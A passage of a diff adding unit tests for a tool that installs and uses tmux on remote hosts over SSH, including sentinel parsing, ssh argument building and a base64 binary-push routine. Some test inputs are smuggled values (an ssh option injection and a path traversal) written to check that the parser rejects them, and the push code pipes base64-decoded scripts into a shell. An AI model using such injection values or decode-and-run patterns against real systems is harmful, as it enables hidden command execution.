+    expect(parseTmuxSentinel(`setup ok ${PURE_NONCE}\r\n`, PURE_NONCE)).toBeUndefined()
+  })
+
+  it('returns null for an explicit tmux=none', () => {
+    expect(parseTmuxSentinel(`setup ok ${PURE_NONCE} tmux=none\r\n`, PURE_NONCE)).toBeNull()
+  })
+
+  it('returns "path" for tier 1 (found on PATH)', () => {
+    expect(parseTmuxSentinel(`setup ok ${PURE_NONCE} tmux=path\r\n`, PURE_NONCE)).toBe('path')
+  })
+
+  it('returns "home" for tier 2 (pre-existing ~/.claude/bin/tmux)', () => {
+    expect(parseTmuxSentinel(`setup ok ${PURE_NONCE} tmux=home\r\n`, PURE_NONCE)).toBe('home')
+  })
+
+  // #242 round-3 correction (I3): the field is a fixed 3-way enum now -- a
+  // value outside path/home/none simply fails to match (same as "not
+  // present"), because the regex alternation IS the allowlist. There is no
+  // longer a captured free-text value for isSafeTmuxBin/isPinnedTmuxPath to
+  // validate (both deleted along with the wire-reported path they used to
+  // gate -- see ssh-tmux.test.ts).
+  it('returns undefined (not a rejection) for any value outside the path/home/none enum, even with a valid nonce', () => {
+    expect(parseTmuxSentinel(`setup ok ${PURE_NONCE} tmux=-oProxyCommand=x\r\n`, PURE_NONCE)).toBeUndefined()
+    expect(parseTmuxSentinel(`setup ok ${PURE_NONCE} tmux=/usr/bin/tmux\r\n`, PURE_NONCE)).toBeUndefined()
+    expect(parseTmuxSentinel(`setup ok ${PURE_NONCE} tmux=tmux\r\n`, PURE_NONCE)).toBeUndefined()
+    expect(parseTmuxSentinel(`setup ok ${PURE_NONCE} tmux=../../tmp/evil\r\n`, PURE_NONCE)).toBeUndefined()
+  })
+
+  // #242 finding I2 correction: no nonce, or the wrong one, is "not present
+  // in this chunk" (undefined) for BOTH the class read AND (per pty-manager's
+  // onData handler) the outer completion latch -- not a rejected-but-seen
+  // value, and not something that can complete setup on its own.
+  it('returns undefined (not a rejection) for a sentinel missing the nonce entirely', () => {
+    expect(parseTmuxSentinel('setup ok tmux=path\r\n', PURE_NONCE)).toBeUndefined()
+  })
+
+  it('returns undefined (not a rejection) for a sentinel carrying the WRONG nonce', () => {
+    expect(parseTmuxSentinel('setup ok wrongnonce tmux=path\r\n', PURE_NONCE)).toBeUndefined()
+  })
+
+  // #242 finding I1: a chunk boundary landing inside the class token, or
+  // mid-nonce, must NOT match a truncated read -- the end-to-end buffering
+  // fix (pty-manager's onData handler) is what makes the LATER chunk get
+  // re-parsed against the accumulated text; this pure function's own
+  // contract is simply "no match yet" for a chunk ending before the line's
+  // terminator.
+  it('returns undefined for a class token truncated by a chunk boundary (no trailing terminator)', () => {
+    expect(parseTmuxSentinel(`setup ok ${PURE_NONCE} tmux=pa`, PURE_NONCE)).toBeUndefined()
+  })
+
+  it('returns undefined for a nonce truncated by a chunk boundary', () => {
+    const mid = Math.floor(PURE_NONCE.length / 2)
+    expect(parseTmuxSentinel(`setup ok ${PURE_NONCE.slice(0, mid)}`, PURE_NONCE)).toBeUndefined()
+  })
+})
+
+// #242 tier 5. Two things this block locks down that no earlier #242 test
+// did:
+//   (b) a tier-3/4 failure reason reaches the renderer over the ACTUAL
+//       `ssh:flowState:<sessionId>` IPC channel (win.webContents.send) --
+//       every earlier test in this file asserted the reason via
+//       getSshFlow(id).getState(), which is a real code path (the overlay's
+//       catch-up poll uses it) but not the PUSH channel a mounted overlay is
+//       actually listening on. A regression that stopped calling
+//       emitSshFlowState (or started swallowing its throw silently) would
+//       leave getState() correct while the renderer never hears about it --
+//       exactly the gap this guards.
+//   (a) SSHOptions.reconnect actually reaches the written claude command as
+//       `--continue`, gated on tmux NOT being in play, end to end through
+//       spawnPty (not just the pure buildSshClaudeFlags unit tested in
+//       ssh-tmux.test.ts).
+function makeSpyWin(): { win: unknown; sends: Array<{ channel: string; state: string; info?: string }> } {
+  const sends: Array<{ channel: string; state: string; info?: string }> = []
+  const win = {
+    webContents: {
+      send: (channel: string, msg: { state: string; info?: string }) => {
+        sends.push({ channel, state: msg.state, info: msg.info })
+      },
+    },
+    isDestroyed: () => false,
+  }
+  return { win, sends }
+}
+
+describe('spawnPty SSH branch — tier-failure reasons reach the renderer over ssh:flowState (#242 tier 5)', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  // Mutation to prove this can fail: have the tier-3 stage-fail branch call
+  // setFlowState directly (bypassing writeClaudeCmd's emit) or drop the
+  // reason argument -- the assertion below finds no matching send.
+  it('emits ssh:flowState:<id> carrying the tmux-stage-fail reason', () => {
+    const { win, sends } = makeSpyWin()
+    onDataListeners.length = 0
+    spawnPty(win as never, 's-flowstate-stagefail', { ssh: SSH } as never)
+    getSshFlow('s-flowstate-stagefail')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-flowstate-stagefail', 'setup ok {NONCE} tmux=none\r\n'))
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-flowstate-stagefail', 'ccc-tmux-stage {NONCE} fail=terminfo\r\n'))
+    vi.advanceTimersByTime(300)
+    const hit = sends.find(
+      (s) => s.channel === 'ssh:flowState:s-flowstate-stagefail' && s.state === 'running-claude',
+    )
+    expect(hit).toBeDefined()
+    expect(hit!.info).toBe('tmux-stage-fail:terminfo')
+  })
+
+  it('emits ssh:flowState:<id> carrying the tmux-push-fail reason', async () => {
+    _setTmuxArchiveResolverForTest(async () => FAKE_TMUX_ARCHIVE)
+    const { win, sends } = makeSpyWin()
+    onDataListeners.length = 0
+    spawnPty(win as never, 's-flowstate-pushfail', { ssh: SSH } as never)
+    getSshFlow('s-flowstate-pushfail')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-flowstate-pushfail', 'setup ok {NONCE} tmux=none\r\n'))
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    feedPtyData('ccc-tmux-push-arch Linux-x86_64\r\n')
+    feedPtyData(nonceSentinel('s-flowstate-pushfail', 'ccc-tmux-stage {NONCE} fail=download\r\n'))
+    await flushMicrotasks()
+    await vi.advanceTimersByTimeAsync(5000)
+    feedPtyData(nonceSentinel('s-flowstate-pushfail', 'ccc-tmux-stage {NONCE} fail=terminfo\r\n'))
+    await vi.advanceTimersByTimeAsync(300)
+    const hit = sends.find(
+      (s) => s.channel === 'ssh:flowState:s-flowstate-pushfail' && s.state === 'running-claude',
+    )
+    expect(hit).toBeDefined()
+    expect(hit!.info).toBe('tmux-push-fail:terminfo')
+    _setTmuxArchiveResolverForTest(null)
+  })
+})
+
+describe('spawnPty SSH branch — SSHOptions.reconnect drives --continue on the bare launch (#242 tier 5)', () => {
+  beforeEach(() => {
+    vi.useFakeTimers()
+  })
+  afterEach(() => {
+    vi.useRealTimers()
+  })
+
+  // Mutation to prove this can fail: drop the buildSshClaudeFlags call (or
+  // its `!!ssh.reconnect`) from writeClaudeCmd -- the written command would
+  // never contain '--continue'.
+  it('writes --continue on the bare launch when reconnect is true and tmux staging fails', () => {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, 's-reconnect-bare', { ssh: { ...SSH, reconnect: true } } as never)
+    writeMock.mockClear()
+    getSshFlow('s-reconnect-bare')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-reconnect-bare', 'setup ok {NONCE} tmux=none\r\n'))
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-reconnect-bare', 'ccc-tmux-stage {NONCE} fail=terminfo\r\n'))
+    vi.advanceTimersByTime(300)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect(claudeWrite![0]).toContain('--continue')
+    expect(claudeWrite![0]).not.toMatch(/new-session\s+-A\s+-s/)
+  })
+
+  // Mutation to prove this can fail: drop the `tmuxInPlay` gate inside
+  // buildSshClaudeFlags (see ssh-tmux.test.ts for the isolated version of
+  // this) -- here it additionally proves pty-manager actually WIRES
+  // `tmuxWrapped` (the real outcome of the wrap attempt) through, not just
+  // that the pure helper itself is correct.
+  it('does NOT write --continue when reconnect is true but tmux IS in play', () => {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, 's-reconnect-tmux', { ssh: { ...SSH, reconnect: true } } as never)
+    writeMock.mockClear()
+    getSshFlow('s-reconnect-tmux')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-reconnect-tmux', 'setup ok {NONCE} tmux=path\r\n'))
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect(claudeWrite![0]).toContain('new-session -A -s ccc-s-reconnect-tmux')
+    expect(claudeWrite![0]).not.toContain('--continue')
+  })
+
+  // Mutation to prove this can fail: drop the `reconnect` gate itself (add
+  // --continue unconditionally whenever tmux is unavailable) -- a session's
+  // FIRST-ever connect (reconnect false/absent) would wrongly get
+  // --continue even though there is no prior conversation.
+  it('does NOT write --continue on a first connect (no reconnect flag) even when tmux staging fails', () => {
+    onDataListeners.length = 0
+    spawnPty(fakeWin, 's-firstconnect-bare', { ssh: SSH } as never)
+    writeMock.mockClear()
+    getSshFlow('s-firstconnect-bare')!.launchClaude()
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-firstconnect-bare', 'setup ok {NONCE} tmux=none\r\n'))
+    vi.advanceTimersByTime(1500)
+    vi.advanceTimersByTime(300)
+    feedPtyData(nonceSentinel('s-firstconnect-bare', 'ccc-tmux-stage {NONCE} fail=terminfo\r\n'))
+    vi.advanceTimersByTime(300)
+    const claudeWrite = writeMock.mock.calls.find((c) => typeof c[0] === 'string' && c[0].includes('claude '))
+    expect(claudeWrite).toBeDefined()
+    expect(claudeWrite![0]).not.toContain('--continue')
+  })
+})

--- a/tests/unit/shared/ssh-tmux-persistence.test.ts
+++ b/tests/unit/shared/ssh-tmux-persistence.test.ts
@@ -1,0 +1,87 @@
+// tests/unit/shared/ssh-tmux-persistence.test.ts
+//
+// #242 tier 5. isSshPersistenceFailureReason/formatPersistenceUnavailableMessage
+// back the SshFlowOverlay rendering (tested separately, renderer-side, via
+// typecheck + the existing renderer suite per this item's acceptance);
+// resolveRunningClaudeInfo backs pty-manager's writeClaudeCmd default. All
+// three are pure, so covered directly here without pty-manager's dependency
+// graph.
+import { describe, it, expect } from 'vitest'
+import {
+  isSshPersistenceFailureReason,
+  formatPersistenceUnavailableMessage,
+  resolveRunningClaudeInfo,
+  SSH_PERSISTENCE_PROBE_NONE,
+} from '../../../src/shared/ssh-tmux-persistence'
+
+describe('isSshPersistenceFailureReason', () => {
+  it('recognises probe=none', () => {
+    expect(isSshPersistenceFailureReason('probe=none')).toBe(true)
+  })
+
+  it('recognises tmux-stage-fail:<reason> and tmux-push-fail:<reason>, including terminfo', () => {
+    expect(isSshPersistenceFailureReason('tmux-stage-fail:terminfo')).toBe(true)
+    expect(isSshPersistenceFailureReason('tmux-push-fail:terminfo')).toBe(true)
+    expect(isSshPersistenceFailureReason('tmux-stage-fail:timeout')).toBe(true)
+    expect(isSshPersistenceFailureReason('tmux-push-fail:aborted')).toBe(true)
+  })
+
+  it('returns false for undefined info (persistence succeeded, no reason to show)', () => {
+    expect(isSshPersistenceFailureReason(undefined)).toBe(false)
+  })
+
+  it('returns false for an unrelated info string from a different stage', () => {
+    // 'inner' is awaiting-claude's info value (container post-connect shell) --
+    // must never be mistaken for a persistence failure.
+    expect(isSshPersistenceFailureReason('inner')).toBe(false)
+    expect(isSshPersistenceFailureReason('host')).toBe(false)
+  })
+})
+
+describe('formatPersistenceUnavailableMessage', () => {
+  it('formats the one-line message with the reason interpolated verbatim, for a non-terminfo reason', () => {
+    expect(formatPersistenceUnavailableMessage('tmux-stage-fail:timeout')).toBe(
+      'persistent session unavailable: tmux-stage-fail:timeout — conversation will resume via --continue on reconnect',
+    )
+    expect(formatPersistenceUnavailableMessage('probe=none')).toBe(
+      'persistent session unavailable: probe=none — conversation will resume via --continue on reconnect',
+    )
+  })
+
+  // M6 (adversarial review round 5): terminfo is the likeliest real-world hit
+  // (#242's own plan) and gets plain language instead of the raw token.
+  // Mutation to prove this can fail: remove the terminfo special-case --
+  // both assertions below then fail, reverting to the raw-token message the
+  // generic test above already covers for OTHER reasons.
+  it('special-cases both tmux-stage-fail:terminfo and tmux-push-fail:terminfo with plain language, not the raw token', () => {
+    const stage = formatPersistenceUnavailableMessage('tmux-stage-fail:terminfo')
+    const push = formatPersistenceUnavailableMessage('tmux-push-fail:terminfo')
+    expect(stage).not.toContain('tmux-stage-fail:terminfo')
+    expect(push).not.toContain('tmux-push-fail:terminfo')
+    expect(stage).toContain('terminfo database')
+    expect(push).toContain('terminfo database')
+    expect(stage).toBe(push) // same plain-language message regardless of which tier hit it
+  })
+})
+
+describe('resolveRunningClaudeInfo (#242 tier 5)', () => {
+  it('passes an explicit reason through verbatim regardless of tmuxInPlay', () => {
+    expect(resolveRunningClaudeInfo('tmux-stage-fail:terminfo', false)).toBe('tmux-stage-fail:terminfo')
+    expect(resolveRunningClaudeInfo('tmux-push-fail:timeout', true)).toBe('tmux-push-fail:timeout')
+  })
+
+  // Mutation this catches: defaulting unconditionally to probe=none
+  // (dropping the `tmuxInPlay` check) would make this fail -- a successful
+  // tmux wrap has nothing to report.
+  it('resolves to undefined with no explicit reason when tmux IS in play', () => {
+    expect(resolveRunningClaudeInfo(undefined, true)).toBeUndefined()
+  })
+
+  // Mutation this catches: returning `explicitReason` unconditionally
+  // (dropping the default entirely) would make this fail -- the whole
+  // point of this function is to never emit 'running-claude' with no info
+  // at all when persistence is unavailable.
+  it('defaults to probe=none with no explicit reason when tmux is NOT in play', () => {
+    expect(resolveRunningClaudeInfo(undefined, false)).toBe(SSH_PERSISTENCE_PROBE_NONE)
+  })
+})

--- a/tests/unit/ssh-args.test.ts
+++ b/tests/unit/ssh-args.test.ts
@@ -7,7 +7,15 @@ import { buildSshArgs } from '../../src/main/ssh-args'
 // dropped `-o`, and an orphaned `ControlPath=none` would become a positional
 // argument -- i.e. the remote command -- breaking every win32 SSH session.
 const target = { username: 'me', host: 'example.com', port: 22 }
-const BASE = ['me@example.com', '-p', '22', '-t', '-o', 'StrictHostKeyChecking=accept-new']
+// ServerAlive* are part of BASE, not a platform extra: #242 adds them on every
+// platform so a dead-but-open TCP connection surfaces and tmux reconnect can
+// take over. They sit inside the base literal, before the win32 mux override.
+const BASE = [
+  'me@example.com', '-p', '22', '-t',
+  '-o', 'StrictHostKeyChecking=accept-new',
+  '-o', 'ServerAliveInterval=30',
+  '-o', 'ServerAliveCountMax=3',
+]
 const WIN_MUX = ['-o', 'ControlMaster=no', '-o', 'ControlPath=none']
 const TUNNEL = ['-R', '5111:127.0.0.1:5111']
 
@@ -42,6 +50,27 @@ describe('buildSshArgs', () => {
     expect(buildSshArgs(target, 0, 'linux').some((a) => a.startsWith('-R'))).toBe(false)
     expect(buildSshArgs(target, 0, 'win32').some((a) => a.startsWith('-R'))).toBe(false)
     expect(buildSshArgs(target, 5111, 'win32')).not.toContain('5111:localhost:5111')
+  })
+
+  it('emits every -o flag as a separate argv entry (never a joined string)', () => {
+    // node-pty passes argv straight to CreateProcess; a joined "-o Foo=bar"
+    // entry would be parsed by ssh.exe as a single malformed option.
+    // 5 = StrictHostKeyChecking + ServerAliveInterval + ServerAliveCountMax
+    // (#242, all platforms) + ControlMaster + ControlPath (#241, win32-only).
+    const args = buildSshArgs(target, 0, 'win32')
+    expect(args.filter((a) => a === '-o')).toHaveLength(5)
+    expect(args.some((a) => a.includes(' '))).toBe(false)
+  })
+
+  // #242: tmux persistence depends on the connection eventually noticing
+  // it's dead (see the doc comment on buildSshArgs). Unlike ControlMaster,
+  // this is NOT platform-conditional.
+  it('sets ServerAliveInterval=30 and ServerAliveCountMax=3 on every platform (#242)', () => {
+    for (const platform of ['win32', 'darwin', 'linux'] as const) {
+      const args = buildSshArgs(target, 0, platform)
+      expect(args).toContain('ServerAliveInterval=30')
+      expect(args).toContain('ServerAliveCountMax=3')
+    }
   })
 })
 

--- a/tests/unit/ssh-tmux-push.test.ts
+++ b/tests/unit/ssh-tmux-push.test.ts
@@ -1,0 +1,563 @@
+// tests/unit/ssh-tmux-push.test.ts
+//
+// #242 tier 4: pushing a pre-downloaded, sha256-verified tmux static build
+// down an already-open SSH PTY as base64, for remotes tier 3 (curl/wget)
+// could not reach because they have no outbound egress at all.
+// buildTmuxPushLines()/buildTmuxPushCommand() are pure string builders
+// (mirrors ssh-tmux-stage.test.ts) so every gate is asserted directly on
+// text, without spinning up a PTY. Each assertion below was verified to
+// actually FAIL against a deliberately broken version of the builder before
+// being kept (see the implementer's report for the exact mutation + failure
+// output).
+import { describe, it, expect } from 'vitest'
+import {
+  chunkBase64,
+  buildTmuxPushControlScript,
+  buildTmuxPushLines,
+  buildTmuxPushCommand,
+  buildArchProbeCommand,
+  buildArchProbeCommandBracketed,
+  parseArchProbeSentinel,
+  mapUnameToTarget,
+  ARCH_PROBE_SENTINEL_PREFIX,
+  PUSH_B64_LINE_MAX,
+  SAFE_B64_RE,
+} from '../../src/main/ssh-tmux-push'
+import { buildTmuxStageScript, TMUX_STAGE_SHA256, TMUX_STAGE_SENTINEL_PREFIX, tmuxStageAssetUrl, type TmuxStageTarget } from '../../src/main/ssh-tmux-stage'
+
+const ARCHES: TmuxStageTarget[] = ['linux-x86_64', 'linux-arm64', 'macos-x86_64', 'macos-arm64']
+
+// #242 finding F1 (b): every builder below now requires a nonce.
+const NONCE = 'testnonce123abc'
+
+/** A synthetic "archive" big enough to require many chunk lines (~7.5x
+ *  PUSH_B64_LINE_MAX), standing in for the real ~1.27 MB base64 payload
+ *  without inflating the test suite's runtime/memory. */
+function fakeTarGzBase64(sizeChars = PUSH_B64_LINE_MAX * 7 + 37): string {
+  // Base64 alphabet only, so a coincidental match against real tmux bytes
+  // is not something these tests depend on either way.
+  const alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
+  let out = ''
+  for (let i = 0; i < sizeChars; i++) out += alphabet[i % alphabet.length]
+  return out
+}
+
+/** Pull the LAST `echo '<b64>' | base64 -d | sh` line out of a lines[] and
+ *  decode it back to the control script's raw shell text. */
+function decodeControlLine(lines: string[]): string {
+  const controlLine = lines[lines.length - 2] // [..., control-b64-line, 'stty echo ...']
+  const m = controlLine.match(/^echo '([A-Za-z0-9+\/=]+)' \| base64 -d \| sh$/)
+  expect(m).not.toBeNull()
+  return Buffer.from(m![1], 'base64').toString('utf8')
+}
+
+describe('chunkBase64', () => {
+  it('splits into maxLen-sized pieces, last piece carrying the remainder', () => {
+    const chunks = chunkBase64('a'.repeat(2500), 1000)
+    expect(chunks).toEqual(['a'.repeat(1000), 'a'.repeat(1000), 'a'.repeat(500)])
+  })
+
+  it('returns a single [""] for an empty string rather than []', () => {
+    expect(chunkBase64('', 1000)).toEqual([''])
+  })
+
+  it('returns exactly one chunk when the input is shorter than maxLen', () => {
+    expect(chunkBase64('abc', 1000)).toEqual(['abc'])
+  })
+
+  it('reassembles to the exact original input when concatenated back', () => {
+    const original = fakeTarGzBase64(12345)
+    expect(chunkBase64(original).join('')).toBe(original)
+  })
+})
+
+describe('buildTmuxPushControlScript', () => {
+  it('embeds the arch-specific sha256 digest from ssh-tmux-stage.ts, not a different one', () => {
+    for (const arch of ARCHES) {
+      const script = buildTmuxPushControlScript(arch, NONCE)
+      expect(script).toContain(TMUX_STAGE_SHA256[arch])
+      // No cross-contamination: the OTHER three archs' digests must not appear.
+      for (const other of ARCHES) {
+        if (other !== arch) expect(script).not.toContain(TMUX_STAGE_SHA256[other])
+      }
+    }
+  })
+
+  // Acceptance (a): the remote-side sha256 re-verification must actually gate
+  // installation, in program order — decode, then re-verify, THEN chmod/mv.
+  // Removing the check (installing straight off the decoded archive) fails
+  // this test.
+  it('re-verifies sha256 on the remote BEFORE chmod/install, gated by $_pdgok', () => {
+    const script = buildTmuxPushControlScript('linux-x86_64', NONCE)
+    expect(script).toContain('sha256sum -c')
+    expect(script).toContain('shasum -a 256 -c') // BSD/macOS fallback
+    const dgIdx = script.indexOf('sha256sum -c')
+    const dgOkIdx = script.indexOf('"$_pdgok" != "0"')
+    const chmodIdx = script.indexOf('chmod 755')
+    expect(dgIdx).toBeGreaterThan(-1)
+    expect(dgOkIdx).toBeGreaterThan(dgIdx)
+    expect(chmodIdx).toBeGreaterThan(dgOkIdx)
+  })
+
+  it('removes the decoded archive and installs nothing on a digest mismatch', () => {
+    const script = buildTmuxPushControlScript('linux-x86_64', NONCE)
+    expect(script).toMatch(/"\$_pdgok" != "0" \]; then rm -f [^;]+; echo "[^"]*fail=digest"/)
+  })
+
+  it('never truncates the final install path directly — extracts to a sibling temp, chmods that, then mv -f', () => {
+    const script = buildTmuxPushControlScript('linux-x86_64', NONCE)
+    expect(script).not.toMatch(/-O tmux > "?\$HOME\/\.claude\/bin\/tmux/)
+    expect(script).toMatch(/tar -xzf [^ ]+ -O tmux > \$HOME\/\.claude\/bin\/\.tmux-push\.\$\$/)
+    expect(script).toMatch(/mv -f \$HOME\/\.claude\/bin\/\.tmux-push\.\$\$ \$HOME\/\.claude\/bin\/tmux/)
+  })
+
+  it('reports the same ok/fail sentinel shape tier 3 uses, so pty-manager needs no new parser', () => {
+    const script = buildTmuxPushControlScript('linux-x86_64', NONCE)
+    expect(script).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} ok path=$HOME/.claude/bin/tmux`)
+    expect(script).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=digest`)
+    expect(script).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=extract`)
+  })
+
+  // #242 finding F1 (b): the nonce must be embedded in every sentinel this
+  // control script emits.
+  it('embeds the nonce in every sentinel literal buildTmuxPushControlScript can emit', () => {
+    const script = buildTmuxPushControlScript('linux-x86_64', NONCE)
+    expect(script).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=digest`)
+    expect(script).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=extract`)
+    expect(script).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} fail=terminfo`)
+    expect(script).toContain(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} ok path=$HOME/.claude/bin/tmux`)
+  })
+
+  it('throws when the nonce fails the charset guard', () => {
+    expect(() => buildTmuxPushControlScript('linux-x86_64', 'has a space')).toThrow(/nonce/i)
+  })
+
+  // #242 round-3 BLOCKER fix. Pre-fix, this function went digest-check ->
+  // tar -> chmod -> mv -f -> straight to `ok path=...` with NO verification
+  // the installed binary can actually open a terminal -- re-arming the
+  // exact permanent landmine tier 3's own round-2 BLOCKER fix removed (see
+  // ssh-tmux-stage.ts's buildTmuxStageScript doc comment, step 5). Mutation
+  // to prove this can fail: delete the smoke-test block (the `_psmoke=...`
+  // line through the matching `fi;`) from buildTmuxPushControlScript and
+  // restore the bare `mv -f ...; echo "... ok path=..."` sequence -- the
+  // `smokeIdx`/`newSessionIdx` lookups then return -1, and
+  // `.toBeGreaterThan(mvIdx)` fails.
+  it('runs a detached smoke test (tmux -V && new-session -d) after mv -f and BEFORE the ok sentinel', () => {
+    const script = buildTmuxPushControlScript('linux-x86_64', NONCE)
+    const mvIdx = script.indexOf('mv -f')
+    const smokeIdx = script.indexOf('-V >/dev/null 2>&1 &&')
+    const newSessionIdx = script.indexOf('new-session -d -s')
+    const okIdx = script.indexOf(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} ok path=$HOME/.claude/bin/tmux`)
+    expect(mvIdx).toBeGreaterThan(-1)
+    expect(smokeIdx).toBeGreaterThan(mvIdx)
+    expect(newSessionIdx).toBeGreaterThan(smokeIdx)
+    expect(okIdx).toBeGreaterThan(newSessionIdx)
+  })
+
+  // Companion assertion: the failure arm of the smoke gate must remove the
+  // just-installed (but terminfo-broken) binary before reporting failure --
+  // "reported removal, not silent removal" (same reasoning tier 3's own
+  // round-2 BLOCKER fix used). Mutation to prove this can fail: report
+  // fail=terminfo without the preceding `rm -f $HOME/.claude/bin/tmux` --
+  // the regex below requires the removal IMMEDIATELY before the sentinel.
+  it('removes the pushed binary and reports fail=terminfo when the smoke test fails, mirroring tier 3', () => {
+    const script = buildTmuxPushControlScript('linux-x86_64', NONCE)
+    expect(script).toMatch(/rm -f \$HOME\/\.claude\/bin\/tmux; echo "[^"]*fail=terminfo"/)
+  })
+
+  // Applies to every arch, not just linux-x86_64 -- the smoke test targets
+  // the SAME install path (PUSH_DEST_PATH) regardless of which arch's
+  // archive was pushed.
+  it('gates the ok sentinel behind the smoke test for every arch', () => {
+    for (const arch of ARCHES) {
+      const script = buildTmuxPushControlScript(arch, NONCE)
+      const mvIdx = script.indexOf('mv -f')
+      const okIdx = script.indexOf(`${TMUX_STAGE_SENTINEL_PREFIX} ${NONCE} ok path=$HOME/.claude/bin/tmux`)
+      const smokeIdx = script.indexOf('new-session -d -s')
+      expect(smokeIdx).toBeGreaterThan(mvIdx)
+      expect(okIdx).toBeGreaterThan(smokeIdx)
+    }
+  })
+})
+
+describe('buildTmuxPushLines', () => {
+  // Acceptance (b): a ~1.27 MB transfer typed one bounded line at a time
+  // must never be echoed into the visible pane. Mutation to prove this can
+  // fail: delete the 'stty -echo'/'stty echo' push()es in buildTmuxPushLines
+  // — the two assertions below then fail because the first/last lines
+  // become 'mkdir -p ...' and the control line respectively.
+  it('brackets the ENTIRE line sequence in stty -echo / stty echo', () => {
+    const lines = buildTmuxPushLines({ arch: 'linux-x86_64', tarGzBase64: fakeTarGzBase64(), nonce: NONCE })
+    expect(lines[0]).toBe('stty -echo 2>/dev/null')
+    expect(lines[lines.length - 1]).toBe('stty echo 2>/dev/null')
+  })
+
+  it('creates ~/.claude/bin defensively before writing into it', () => {
+    const lines = buildTmuxPushLines({ arch: 'linux-x86_64', tarGzBase64: fakeTarGzBase64(), nonce: NONCE })
+    expect(lines).toContain('mkdir -p "$HOME/.claude/bin" 2>/dev/null')
+  })
+
+  it('splits the payload across multiple chunk lines rather than one giant line', () => {
+    const b64 = fakeTarGzBase64() // ~7.5x PUSH_B64_LINE_MAX
+    const lines = buildTmuxPushLines({ arch: 'linux-x86_64', tarGzBase64: b64, nonce: NONCE })
+    const chunkLines = lines.filter((l) => /^echo '[A-Za-z0-9+\/=]*' >> /.test(l))
+    expect(chunkLines.length).toBeGreaterThan(1)
+    expect(chunkLines.length).toBe(Math.ceil(b64.length / PUSH_B64_LINE_MAX))
+  })
+
+  // Acceptance (c): no single line may exceed a safe length. 4096 is the
+  // canonical-mode tty line-discipline limit this constant exists to stay
+  // under (see PUSH_B64_LINE_MAX's doc comment) — asserted against the FULL
+  // line (including the `echo '…' >> <path>` wrapper), not just the base64
+  // substring, since the wrapper's overhead is what a naive "just don't
+  // chunk the base64 itself" fix would forget to account for.
+  it('never emits a line longer than the safe tty canonical-mode limit', () => {
+    const b64 = fakeTarGzBase64(200_000) // well beyond one line at any reasonable chunk size
+    const lines = buildTmuxPushLines({ arch: 'linux-x86_64', tarGzBase64: b64, nonce: NONCE })
+    const SAFE_TTY_LINE_MAX = 4096
+    for (const line of lines) {
+      expect(line.length).toBeLessThanOrEqual(SAFE_TTY_LINE_MAX)
+    }
+    // And the invariant is doing real work, not vacuously true because
+    // nothing this long was ever produced.
+    expect(lines.some((l) => l.length > PUSH_B64_LINE_MAX)).toBe(true)
+  })
+
+  it('concatenating every chunk line\'s base64 payload back together reproduces the exact original archive bytes', () => {
+    const b64 = fakeTarGzBase64(54321) // not a multiple of PUSH_B64_LINE_MAX
+    const lines = buildTmuxPushLines({ arch: 'linux-x86_64', tarGzBase64: b64, nonce: NONCE })
+    const reassembled = lines
+      .filter((l) => /^echo '[A-Za-z0-9+\/=]*' >> /.test(l))
+      .map((l) => l.match(/^echo '([A-Za-z0-9+\/=]*)' >> /)![1])
+      .join('')
+    expect(reassembled).toBe(b64)
+  })
+
+  it('base64-wraps the control line so its sentinel literals never appear in plaintext', () => {
+    const lines = buildTmuxPushLines({ arch: 'linux-x86_64', tarGzBase64: fakeTarGzBase64(), nonce: NONCE })
+    const joined = lines.join('\n')
+    // Mutation to prove this can fail: inline buildTmuxPushControlScript's
+    // raw text directly instead of base64-wrapping it — every one of these
+    // then fails, because the raw control script contains the prefix and
+    // every fail=/ok literal verbatim (mirrors the equivalent
+    // buildTmuxStageCommand test in ssh-tmux-stage.test.ts).
+    expect(joined).not.toContain(TMUX_STAGE_SENTINEL_PREFIX)
+    expect(joined).not.toContain('fail=digest')
+    expect(joined).not.toContain('fail=extract')
+    expect(joined).not.toContain('ok path=')
+    expect(joined).not.toContain('sha256sum')
+  })
+
+  it('the control line decodes back to EXACTLY buildTmuxPushControlScript for the same arch', () => {
+    for (const arch of ARCHES) {
+      const lines = buildTmuxPushLines({ arch, tarGzBase64: 'AAAA', nonce: NONCE })
+      expect(decodeControlLine(lines)).toBe(buildTmuxPushControlScript(arch, NONCE))
+    }
+  })
+
+  it('is deterministic for the same input', () => {
+    const input = { arch: 'linux-x86_64' as const, tarGzBase64: fakeTarGzBase64(), nonce: NONCE }
+    expect(buildTmuxPushLines(input)).toEqual(buildTmuxPushLines(input))
+  })
+
+  // #242 round-2 BLOCKER regression test. The accumulator file is written by
+  // the interactive remote shell (chunk lines, `>>`) but read by a DIFFERENT
